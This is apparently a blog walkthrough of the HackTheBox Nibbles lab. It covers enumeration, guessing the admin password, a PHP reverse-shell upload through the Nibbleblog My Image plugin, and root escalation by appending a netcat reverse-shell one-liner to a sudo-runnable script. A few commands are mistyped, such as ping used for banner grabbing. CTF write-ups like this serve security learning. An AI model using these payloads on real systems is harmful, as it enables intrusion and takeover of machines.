HackTheBox: Nibbles— Walkthrough

December 28, 2024
December 28, 2024 Jasper

Welcome! It is time to look at the Nibbles machine on HackTheBox. Nibbles is a fairly simple machine, however with the inclusion of a login blacklist, it is a fair bit more challenging to find valid credentials. Luckily, a username can be enumerated and guessing the correct password does not take long for most.

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by playing HTB machines.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Machine URL: https://app.hackthebox.com/machines/Nibbles


Enumeration

Let’s get started. As a start it is always a good idea to do a simple ICMP ping to see that the machine is running and that we have a connection:

ping 10.10.10.75
Pinging the machine

We get a response back, so everything is great.

Now let’s continue by running nmap.

nmap -sV -sC — open -oA nibbles_nmap 10.10.10.75

The -sV flag provides version detection, while the –sC flag runs some basic scripts. The -oA flag saves the output in different formats.

Running nmap

We see two open ports, one running a SSH service (used for remote access to the machine) and the other port is running a http server.

We can do some banner grabbing on the ports with netcat to confirm this:

ping 10.10.10.75 <port number>
Grabbing the banner on port 22

Web Footprinting

Let’s visit the page:

Visiting the homepage

Nothing interesting here. What about the source code?

Checking the source code

A nibbleblog directory. Interesting! This shows us a simple CMS system:

Finding the nibbleblog CMS

If we use the Wappalyzer plugin for your favorite browser we can see that the site is running on PHP:

Using Wappalyzer plugin

Similar information can be gained by running the whatweb binary in the terminal:

whatweb 10.10.10.75/nibbleblog
Running whatweb as alternative to Wappalyzer

Directory enumeration

It is time to use gobuster to find other useful pages and directories:

gobuster dir -u http://10.10.10.75/nibbleblog/ --wordlist /usr/share/dirb/wordlists/common.txt
Using gobuster to enumerate directories

Lots of interesting finds here!

We found both a admin.php page, and some interesting folder such as content, language, plugins and themes! And directory listing is enabled, since we can see the different files and folders directly in the browser:

Looking through directories

We can also found more interesting stuff at /content/private/:

Some “private” files

This directory includes a config file:

Config.xml file

There is also a user file, which confirms there is a admin user.

Users.xml file

There is also a readme file which tells us that the Nibbleblog is running on version v4.0.3.

Finding the version number in the README file

Now let’s take a look at that admin page:

Admin page

We can try and use some standard username/password combination such as admin/admin, or admin/admin. These unfortunately do not work, so we need to be a bit more creative.

The site title is called nibbles, and we see this in the config file a bit as well. Could this the password, combined with the admin username we found before?

Bingo!

Logging in into the admin page

Initial Foothold

Now we need to have a look around to see if we can find some vulnerabilities.

And after some browsing around we come across a plugin with the name “My image”.

Finding the My Image plugin

We can press configure, and this allows us to upload a file. If this file upload function allows us to upload PHP files, it could allow us to upload a reverse shell!

We can test this by creating a simple PHP which echos the working directory.

<?php system('pwd'); ?>
Saving the payload.php file

We can then try to upload it:

Uploading the payload

If we afterwards look into the /content/private/plugins/my_image/ directory, we can see the file there (although renamed as image.php):

The payload is uploaded into the /content/private/plugin/my_image folder

If we click the file, the payload should run:

Running the payload

It does, so this CMS is definitely vulnerable. Let’s find a real reverse shell payload. We can find a common one here:

Copy the script contents in a new file (or reuse the previous one):

Editing the reverse shell script

Remember to update the ip (to the attacker ip) and port so it suits your needs.

Now, start up a simple netcat listener on the same port added to the script. This can then receive the reverse shell.

nc -lvnp 1234

Now, upload the file and run it by visiting it in the browser:

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

This should give you a reverse shell:

Gaining a foothold

While this is great, this does not give us a particularly nice shell to work with. We need to make it smarter by making it fully interactive. We call this upgrading to a fully interactive TTY. We can do this with a simple Python call and should look like this:

python3 -c 'import pty; pty.spawn("/bin/bash")'

This gives us a more regularly looking shell:

Improving our shell

Optional:

If you want a even more stable shell you can use the following commands:

python -c 'import pty; pty.spawn("/bin/bash")'
# background the shell: CTRL + Z
stty raw -echo
fg
export TERM=xterm
Stabilizing our shell

Now we can access the user.txt flag in the nibbler home directory:

Finding the user.txt flag

Privilege Escalation

This is great, but we will want more privileges.

In the home directory where we found the flag there was also a zip file. We can unzip this by running:

unzip personal.zip
Unzipping the personal zip file

It contains an interesting shell script.

If we list our privileges we can read that we can run this shell script with root privileges:

We can run the monitor.sh file with root privileges

We could also have figured this out (and more!) by running a script such as LinEnum or LinPEAS!

Now that we know that the file gets run with root privileges, we can add a reverse shell script to the end of it so that we gain a reverse shell with root privileges. We need to add it to the end so that the rest of the script runs as normal and does not get disrupted.

We can use the following command to add a one-liner to the monitor.sh shell script:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 8443 >/tmp/f' | tee -a monitor.sh

Remember to edit the ip address, and take note of the port number (8443). Now all that is needed is running another netcat listener:

nc -lvnp 8443

And run the script!

sudo /home/nibbler/personal/stuff/monitor.sh
Running the script, and gaining root access through our listener

We got root access!

Now, simply read the root.txt flag in the /root directory:

We found the root flag!

That’s it! We are done!

I should possibly mention that all of this could be done in a few seconds by using the Metasploit module called exploit/multi/http/nibbleblog_file_upload

The steps would be like this:

  • Searching for the module
Searching for the module
  • Activating it by running use 0.
  • Setting the options (ip, ports, admin username and password)
Showing the options
  • Setting the target:
Setting the target
  • Running the module by entering run.
Gaining a meterpreter shell!
  • Gaining access!

Try it for yourself as practice. Both strategies are worth trying as it will help you to become smarter 🙂


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

Leave a Reply

Your email address will not be published. Required fields are marked *